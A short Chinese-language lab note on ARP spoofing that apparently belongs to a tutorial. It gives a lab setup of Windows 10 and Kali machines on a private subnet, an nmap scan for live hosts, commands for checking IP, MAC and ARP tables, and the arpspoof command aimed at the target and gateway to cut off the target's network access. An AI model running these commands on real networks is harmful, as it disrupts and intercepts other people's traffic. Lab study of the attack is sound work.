实验环境
Windows10:192.168.231.134
MAC:00:0c:29:9e:4e:e2
网关:192.168.231.2
kali:192.168.231.132
MAC:00-0C-29-7D-EA-A0
一、ARP断网+欺骗
1、断网
- 搜索当前网段有哪些存活的主机
nmap -sS -sV 192.168.231.0/24
扫到了这次目标机的IP和MAC地址
- 查看kaliMAC地址和目标机ARP映射表
ifconfig -a — 查看Kali的IP和MAC
ipconfig /all — 查看目标机的IP和MAC
arp -a — 查看目标机ARP映射表
- 攻击代码
arpspoof -n
Arpspoof -i 网卡 -t 目标IP 网关